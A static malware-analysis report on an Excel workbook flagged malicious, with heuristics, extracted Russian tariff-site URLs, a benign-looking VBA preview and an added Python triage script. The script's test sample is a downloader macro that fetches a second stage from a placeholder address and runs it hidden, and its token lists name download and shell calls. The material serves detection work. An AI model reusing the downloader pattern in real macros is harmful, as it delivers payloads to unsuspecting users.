Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 66c915e6284d557c…

MALICIOUS

Office (OLE)

Size: 2.00 MB
Created: 2004-05-21 07:18:45
Authoring application: Microsoft Excel
First seen: 2020-08-10
MD5: c64060d55bc5d48068a2841e8e8940b4
SHA-1: e91d0d3f7b0ce03dadc56ce5a5ada8cc452c1b83
SHA-256: 66c915e6284d557ca11bc3601520838cc5b54ea3e34f9c866c4f0c207fcedad4
Risk score: 144

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment
T1140 Deobfuscate/Decode Files or Information

The sample is an Excel workbook whose VBA project defines a Workbook_Open auto-execute handler. In the previewed source that handler only calls modThisWorkbook.ThisWorkbook_Workbook_Open, a procedure that lies outside the portion of the preview shown below, so what actually runs on open cannot be confirmed from the visible source. The heuristics place the auto-execute token next to a CreateObject call and download/execution tokens in the compiled p-code stream; that combination is the pattern used to fetch and run a second-stage payload over XMLHTTP, and it is the basis for the verdict. The carved source is 1,191,016 bytes, uses Option Explicit, named modules and Russian-language comments, and produced only one eval/decoder/string-building token, so obfuscation is not evident in the previewed portion. The document body carries what appears to be financial or organizational data together with links to eias.ru and fstrf.ru hosts (listed below); this may be a lure or the workbook's original purpose, and the question is settled by reading ThisWorkbook_Workbook_Open and every CreateObject call site in the full extract.

Heuristics 6

  • VBA macros detected (medium; 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code.
  • Workbook_Open macro (high) OLE_VBA_WBOPEN
    The VBA project defines a Workbook_Open handler, which Excel runs as soon as macros are enabled. In the preview below it delegates to modThisWorkbook.ThisWorkbook_Workbook_Open.
  • CreateObject call (high) OLE_VBA_CREATEOBJ
    The VBA source calls CreateObject, the usual way a macro instantiates COM objects such as XMLHTTP, WScript.Shell or ADODB.Stream. The call site does not appear in the portion of the preview shown below.
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This rule catches p-code-only macro documents and documents whose source extraction failed, where no visible source is available.
  • Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE
    One or more files carved from the sample matched static suspicious-content checks (script obfuscation, encoded payload blobs, packed data, or execution/download terms).
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. A URL is not itself a detection; the per-URL label gives the channel (macro, JS, link annotation, document body, ...) that reached it. Every URL below came from the document body and none from the macro code. The schemas.openxmlformats.org, w3.org and ns.adobe.com entries are XML namespace identifiers from embedded DrawingML and XMP metadata, not network destinations.
    • http://www.fstrf.ru/regions/region/showlist  In document text (OLE body)
    • http://www.gmcgks.ru/index.php?id=21036  In document text (OLE body)
    • http://www.gmcgks.ru/index.php?id=21046  In document text (OLE body)
    • http://tariff.support/index.php?a=add&catid=67  In document text (OLE body)
    • https://tariff.eias.ru/procwsxls/  In document text (OLE body)
    • https://appsrv02.eias.ru/procwsxls/  In document text (OLE body)
    • https://appsrv01.eias.ru/procwsxls/  In document text (OLE body)
    • https://eias.fstrf.ru/procwsxls/  In document text (OLE body)
    • https://altai-app.eias.ru/procwsxls/  In document text (OLE body)
    • http://rb-regservices.eias.ru/procwsxls/  In document text (OLE body)
    • http://www.eias.ru/templates/  In document text (OLE body)
    • http://base.consultant.ru/cons/cgi/online.cgi?req=doc;base=LAW;n=133360;dst=0;ts=976FAE4D17FED02FE84251FA347CBCC1;rnd=0.38204030096458275  In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main  In document text (OLE body); XML namespace identifier
    • http://www.gks.ru/metod/classifiers.html  In document text (OLE body)
    • http://base.consultant.ru/cons/cgi/online.cgi?req=doc;base=LAW;n=178809;fld=134;dst=100013;rnd=180312.43506395909935236;;ts=018031221943964948877692  In document text (OLE body)
    • http://base.consultant.ru/cons/cgi/online.cgi?req=doc;base=LAW;n=179370;fld=134;from=179211-102;rnd=180312.9268793507944793;;ts=0180312467623938806355  In document text (OLE body)
    • http://base.consultant.ru/cons/cgi/online.cgi?req=doc;base=LAW;n=139322;fld=134;dst=100008;rnd=180312.45840900391340256;;ts=018031229105898505076766  In document text (OLE body)
    • http://base.consultant.ru/cons/cgi/online.cgi?req=doc;base=LAW;n=186745;fld=134;from=179211-90;rnd=180312.18053538468666375;;ts=01803129223564297426492  In document text (OLE body)
    • http://base.consultant.ru/cons/cgi/online.cgi?req=doc;base=LAW;n=167465;fld=134;dst=100284;rnd=180312.07675228593870997;;ts=0180312020631691208109263  In document text (OLE body)
    • http://tarif.omskportal.ru/procwsxls/  In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#  In document text (OLE body); XML namespace identifier
    • http://ns.adobe.com/xap/1.0/  In document text (OLE body); XML namespace identifier
    • http://ns.adobe.com/xap/1.0/mm/  In document text (OLE body); XML namespace identifier
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#  In document text (OLE body); XML namespace identifier

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1191016 bytes
SHA-256: 3933236553507eacf4576b3858c6c9979622e03efcdeb2c6eee817de9e5129e2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token. One such token in 1,191,016 bytes of source is a weak signal on its own; locate it in the full extract and judge it by what it builds and where the result goes.
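The heuristics above (OLE_VBA_WBOPEN, OLE_VBA_CREATEOBJ, the auto-exec-plus-execution-token rule and the per-channel URL labels) and the artifact triage's token count can be reproduced over the decoded source that olevba writes out. The Python below is an added example written for this page, not the analysis platform's code: the rule IDs copy the report's, but the token lists, the source-level OLE_VBA_AUTOEXEC_EXEC rule standing in for the p-code rule, the namespace host list and the two VBA samples (one that delegates Workbook_Open the way the preview below does, one constructed downloader pointed at a TEST-NET-3 address) are assumptions. It also lists procedures an auto-exec handler calls that the extract does not define, which is exactly the gap the preview leaves around modThisWorkbook.ThisWorkbook_Workbook_Open.

```python
"""Source-level version of the report's triage rules, run over decoded VBA (what
olevba writes to macros.bas) and document body text. Added example, not the
analysis platform's code; token lists, rule names and namespace hosts are assumptions."""
import re

AUTOEXEC_NAMES = ("workbook_open", "auto_open", "document_open", "autoopen")
AUTOEXEC = re.compile(r"\bSub\s+(Workbook_Open|Auto_Open|Document_Open|AutoOpen)\b", re.I)
OBJECT_EXEC = re.compile(r"\bCreateObject\s*\(", re.I)
DOWNLOAD = re.compile(r"\b(XMLHTTP|WinHttpRequest|URLDownloadToFile|ADODB\.Stream)\b", re.I)
SHELL = re.compile(r"\b(Shell|ShellExecute)\b|\.Run\b", re.I)
STRING_BUILD = re.compile(r"\b(Chr[BW]?|StrReverse|Execute|Eval|CallByName)\$?\s*\(", re.I)
SUB_DEF = re.compile(r"^\s*(?:Public|Private|Friend)?\s*(?:Static\s+)?(?:Sub|Function)\s+(\w+)", re.I | re.M)
SUB_BODY = re.compile(r"^\s*(?:Private|Public|Friend)?\s*Sub\s+(\w+)\s*\([^)]*\)(.*?)^\s*End Sub", re.I | re.M | re.S)
COMMENT = re.compile(r'''^((?:[^"'\n]|"[^"\n]*")*)'[^\n]*''', re.M)  # apostrophe outside a string literal
URL_RE = re.compile(r"https?://[^\s\"'<>)\]]+", re.I)
NAMESPACE_HOSTS = {"schemas.openxmlformats.org", "schemas.microsoft.com", "www.w3.org", "ns.adobe.com", "purl.org"}
# Words that start a statement without being a call to a user-defined procedure.
NOT_A_CALL = {"dim", "set", "let", "if", "else", "elseif", "end", "on", "with", "for", "next", "do", "loop",
              "exit", "goto", "select", "case", "application", "me", "thisworkbook", "activeworkbook",
              "msgbox", "shell", "kill", "open", "close", "debug"}

def strip_comments(source):
    """Remove VBA line comments so a CreateObject mentioned in a comment cannot fire a rule."""
    return COMMENT.sub(r"\1", source)

def triage_vba(source):
    """Return ([(rule_id, severity), ...], count of eval/decoder/string-building tokens)."""
    code = strip_comments(source)
    findings = []
    if code.strip():
        findings.append(("OLE_VBA_MACROS", "medium"))
    if re.search(r"\bSub\s+Workbook_Open\b", code, re.I):
        findings.append(("OLE_VBA_WBOPEN", "high"))
    if OBJECT_EXEC.search(code):
        findings.append(("OLE_VBA_CREATEOBJ", "high"))
    # Source-level analogue of OLE_VBA_PCODE_AUTOEXEC_EXEC: auto-exec handler plus execution token.
    if AUTOEXEC.search(code) and (OBJECT_EXEC.search(code) or DOWNLOAD.search(code) or SHELL.search(code)):
        findings.append(("OLE_VBA_AUTOEXEC_EXEC", "high"))
    return findings, len(STRING_BUILD.findall(code))

def autoexec_callees(source):
    """Procedures an auto-exec handler calls that the extract does not define (behaviour outside the visible source)."""
    code = strip_comments(source)
    defined = {n.lower() for n in SUB_DEF.findall(code)}
    unresolved = []
    for m in SUB_BODY.finditer(code):
        name, body = m.group(1), m.group(2)
        if name.lower() not in AUTOEXEC_NAMES:
            continue
        local = {d.split()[0].lower() for decl in re.findall(r"\bDim\s+(.+)", body, re.I)
                 for d in decl.split(",") if d.strip()}
        for line in body.splitlines():
            line = line.strip()
            if line.lower().startswith("call "):
                line = line[5:].strip()
            t = re.match(r"(?:(\w+)\.)?(\w+)", line)
            if not t or {(t.group(1) or "").lower(), t.group(2).lower()} & (NOT_A_CALL | local):
                continue
            if t.group(2).lower() not in defined:
                unresolved.append(f"{name} -> {t.group(0)}")
    return unresolved

def extract_urls(channels):
    """channels maps a label (macro, body, ...) to text; returns (url, channel, is_xml_namespace),
    trailing extraction debris trimmed and exact duplicates within a channel dropped."""
    seen, out = set(), []
    for label, text in channels.items():
        for m in URL_RE.finditer(text):
            url = m.group(0).rstrip(".,;:_\x00\ufffd")
            if (url.lower(), label) not in seen:
                seen.add((url.lower(), label))
                out.append((url, label, url.split("/")[2].lower() in NAMESPACE_HOSTS))
    return out

# Constructed samples, not content of the analysed file.
DELEGATING_VBA = r'''Option Explicit
Private Sub Workbook_Open()
  ' CreateObject appears here only inside a comment
  modThisWorkbook.ThisWorkbook_Workbook_Open
End Sub
'''
DOWNLOADER_VBA = r'''Private Sub Workbook_Open()
  Dim h As Object, p As String
  Set h = CreateObject("MSXML2.XMLHTTP")
  h.Open "GET", "http://203.0.113.10/stage2.bin", False  ' TEST-NET-3 address
  h.Send
  p = Environ("TEMP") & "\" & StrReverse("exe.etadpu")
  Shell p, vbHide
End Sub
'''
BODY_TEXT = ("https://tariff.eias.ru/procwsxls/\ufffd\nhttps://tariff.eias.ru/procwsxls/\n"
             "http://schemas.openxmlformats.org/drawingml/2006/main\n")

if __name__ == "__main__":
    for label, src in (("delegating", DELEGATING_VBA), ("downloader", DOWNLOADER_VBA)):
        print(label, triage_vba(src), "unresolved auto-exec callees:", autoexec_callees(src))
    for url, channel, ns in extract_urls({"macro": DOWNLOADER_VBA, "body": BODY_TEXT}):
        print(f"{url}  [{channel}]" + ("  (XML namespace, not a destination)" if ns else ""))
```

Run it directly to print both samples' findings; the output of olevba --decode can be passed to triage_vba unchanged. The delegating sample trips OLE_VBA_WBOPEN but not the execution rule, and its comment mentioning CreateObject is ignored because comments are stripped before matching, while the downloader trips all four rules and one string-building token. The p-code rule itself cannot be reproduced from source; for that, dump the compiled stream with pcodedmp and look for the same token pairing there.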
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)

    Application.Calculate
    
    modThisWorkbook.ThisWorkbook_Workbook_BeforeSave
    
    On Error GoTo ErrHandler
    
    Dim status As Integer
    status = ThisWorkbook.CustomDocumentProperties("Status")
    If status > 2 Then
      MsgBox "Документ подписан ЭЦП и не может быть изменен", vbExclamation + vbOKOnly, ThisWorkbook.name  ' "The document is signed with a digital signature and cannot be changed"
      Cancel = True
      GoTo CleanUp
    End If
    
    GoTo CleanUp

ErrHandler:
    MsgBox Error.Description, vbOKOnly + vbExclamation, ThisWorkbook.name

CleanUp:

End Sub

Private Sub Workbook_Open()
  modThisWorkbook.ThisWorkbook_Workbook_Open
End Sub

Private Sub Workbook_BeforePrint(Cancel As Boolean)
  modThisWorkbook.ThisWorkbook_Workbook_BeforePrint
End Sub

Attribute VB_Name = "modChange"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Base 1
Option Explicit

Public Sub WsInstructionChange(Target As Range, _
                               ByRef cmdApplyContactChanges As CommandButton)
  
  If Target.Interior.ColorIndex = colorYellow Then
    cmdApplyContactChanges.Enabled = True
    cmdApplyContactChanges.Visible = True
  End If

End Sub

Public Sub WsTitleChange(Target As Range)
  
  On Error GoTo ErrWsTitleChange

  Dim wsSheet As Worksheet
  Dim intCounter As Integer
  Dim intColumnCounter As Integer
  Dim strMRName As String
  Dim strMOName As String
  Dim strOKTMOValue As String
  Dim strNameLineCode(7) As String  ' list of line codes that contain formulas
  Dim strCopyRangeName As String
  Dim wbBook As Workbook
  Dim wsTechSheet As Worksheet
  Dim wsTEHSHEETSheet As Worksheet
  Dim wsWorkSheet As Worksheet
  Dim rngRange As Range
  Dim rngTempRange As Range
  Dim ISect

  Application.EnableEvents = False
  Application.ScreenUpdating = False

  Set wbBook = Me.Parent
  Set rngRange = wbBook.Names("MR_LIST").RefersToRange
  Set wsTechSheet = rngRange.Parent
  Set wsTEHSHEETSheet = wbBook.Sheets(gstrTehSheetSheetName)
  
  Set wsSheet = Target.Parent
  
  ' Branch flag
  Set ISect = Application.Intersect(Target, wsSheet.Range("fil_flag"))
  If Not ISect Is Nothing Then
    
    modServiceModule.UNPROTECT_SHEET wsSheet
     
    If Target.cells(1, 1).value = "да" Then  ' "да" = "yes"
      wsSheet.Range("fil").cells(1, 1).Select
      Selection.Interior.ColorIndex = colorCyan
      wsSheet.Range("fil").cells(1, 1).EntireRow.Hidden = False
      Selection.Locked = False
    Else
      wsSheet.Range("fil").cells(1, 1).Select
      Selection.ClearContents
      Selection.Interior.ColorIndex = colorWhite
      wsSheet.Range("fil").cells(1, 1).EntireRow.Hidden = True
      Selection.Locked = True
    End If
      
    Target.Select
    
    modServiceModule.PROTECT_SHEET wsSheet, True
    
    GoTo CleanUp
    
  End If
  
  ' Small-business entity flag
  Set ISect = Application.Intersect(Target, wsSheet.Range("OrgIsSmallBusiness"))
  If Not ISect Is Nothing Then
    
    strNameLineCode(1) = "1100"
    strNameLineCode(2) = "1200"
    strNameLineCode(3) = "1600"
    strNameLineCode(4) = "1300"
    strNameLineCode(5) = "1400"
    strNameLineCode(6) = "1500"
    strNameLineCode(7) = "1700"
    
    For intCounter = LBound(strNameLineCode) To UBound(strNameLineCode)
        If modServiceModule.IsNameExists(wbBook, "LINE_" & strNameLineCode(intCounter) & "_1") And _
           modServiceModule.IsNameExists(wbBook, "LINE_" & strNameLineCode(intCount
... (truncated)